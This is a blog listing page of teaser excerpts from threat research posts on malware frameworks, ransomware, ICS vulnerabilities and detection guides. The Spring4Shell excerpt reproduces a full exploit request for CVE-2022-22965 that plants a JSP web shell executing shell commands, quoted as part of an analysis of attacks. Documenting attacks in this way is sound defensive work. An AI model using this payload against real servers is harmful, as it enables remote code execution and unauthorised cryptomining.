research

NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service

Posted on by Admin
NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service

NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service Malware This report focuses on the components and infection chain ⁠of the NetDooka framework. Its scope ranges from the release of the first payload up until the release of the final RAT that is protected by a kernel driver. By: Aliakbar Zahravi, Leandro Froes May 05, 2022 Read time:  ( words) We recently encountered a fairly sophisticated malware framework that we named NetDooka after…

Read More

New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware

Posted on by Admin
New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware

We dubbed these downloaders PuppetDownloaders since they are connected to the PuppetLoader malware family, as evidenced by our observations: This malware and PuppetLoader both use the same string decryption routine that uses the same key. This malware and PuppetLoader both use the same XOR key (2726c6aea9970bb95211304705b5f595) that is used to decrypt the embedded Loader.dll file. This malware and PuppetLoader’s decrypted Loader.dlls share similar strings such as “[-] UnExist pwszModuleFunName:”. This suggests that a common framework…

Read More

Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners

Posted on by Admin
Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners

Among the exploitation attempts were ones aimed at deploying cryptocurrency miners. In this section, we look at how the malicious actors behind these exploitation attempts create a web shell to deploy their cryptocurrency miners. The following code is used to create the web shell: GET /?class.module.classLoader.resources.context.parent.pipeline.first.prefix=zbc0fb&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps%2FROOT&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di HTTP/1.1 Host: <redacted>:<redacted> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: */* Accept-Language: en-US,en;q=0.5 X: <% Y: Runtime Z: %>// Accept-Encoding: gzip   The web shell’s…

Read More

Critically Underrated: Studying the Data Distribution Service (DDS) Protocol

Posted on by Admin
Critically Underrated: Studying the Data Distribution Service (DDS) Protocol

By Federico Maggi, Rainer Vosseler (Trend Micro Research), Mars Cheng, Patrick Kuo, Chizuru Toyama, Ta-Lun Yen (TXOne Networks), Erik Boasson (ADLINK), and Victor Mayoral Vilches (Alias Robotics) Despite being unknown even to industry practitioners, the Data Distribution Service (DDS) protocol has been in use for more than a decade. This middleware software technology is responsible for running billions of public and private devices and mechanisms currently in use.  DDS is integral in embedded systems that…

Read More

An Investigation of the BlackCat Ransomware via Trend Micro Vision One

Posted on by Admin
An Investigation of the BlackCat Ransomware via Trend Micro Vision One

An Investigation of the BlackCat Ransomware via Trend Micro Vision One Ransomware We recently investigated a case related to the BlackCat ransomware group using the Trend Micro Vision One™ platform, which comes with extended detection and response (XDR) capabilities. BlackCat (aka AlphaVM or AlphaV) is a ransomware family created in the Rust programming language and operated under a ransomware-as-a-service (RaaS) model. By: Lucas Silva, Leandro Froes April 18, 2022 Read time:  ( words) We recently…

Read More

An In-Depth Look at ICS Vulnerabilities Part 3

Posted on by Admin
An In-Depth Look at ICS Vulnerabilities Part 3

The items on this chart are showing what percentages of ICS-affecting vulnerabilities identified by 2021 advisories are caused by what kind of weaknesses – “flaws, faults, bugs, or other errors” – in coding. Nine percent was caused by CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer, while CWE-787 Out-of-Bounds Write affected 8.3%. Additionally, 6.7% was caused by CWE-20 Improper Input Validation and 4.8% was due to CWE-79 Improper Neutralization of Input…

Read More

Detecting Exploitation of Local Vulnerabilities Through Trend Micro Vision One and Cloud One

Posted on by Admin
Detecting Exploitation of Local Vulnerabilities Through Trend Micro Vision One and Cloud One

Detecting Exploitation of Local Vulnerabilities Through Trend Micro Vision One and Cloud One Exploits & Vulnerabilities We provide a guide to detecting Dirty Pipe, a Linux kernel vulnerability tracked as CVE-2022-0847.  By: Sunil Bharti April 06, 2022 Read time:  ( words) This blog provides threat analysts a guide to detecting an arbitrary file overwrite vulnerability in Linux Kernel, also known as Dirty Pipe. Dirty Pipe is a local privilege escalation vulnerability that is tracked as CVE-2022-0847….

Read More

Thwarting Loaders: From SocGholish to BLISTER’s LockBit Payload

Posted on by Admin
Thwarting Loaders: From SocGholish to BLISTER’s LockBit Payload

Thwarting Loaders: From SocGholish to BLISTER’s LockBit Payload Cyber Threats Both BLISTER and SocGholish are loaders known for their evasion tactics. Our report details what these loaders are capable of and our investigation into a campaign that uses both to deliver the LockBit ransomware. By: Earle Maui Earnshaw, Mohamed Fahmy, Ian Kenefick, Ryan Maglaque, Abdelrhman Sharshar, Lucas Silva April 05, 2022 Read time:  ( words) The Trend MicroTM Managed XDR team has made a series…

Read More

An In-Depth Look at ICS Vulnerabilities Part 2

Posted on by Admin
An In-Depth Look at ICS Vulnerabilities Part 2

This chart shows CVEs affecting Critical Manufacturing that was identified in 2021 advisories which might be used to accomplish tactics from the MITRE ATT&CK framework ease of reading. Names and definitions of tactics are directly referenced from the MITRE ATT&CK framework. Six hundred and thirteen CVEs identified in advisories in 2021 are likely to affect Critical Manufacturing environments, 88.8% of them might be leveraged by attackers to create an Impact (to directly or indirectly cause…

Read More
1 11 12 13 14 15 18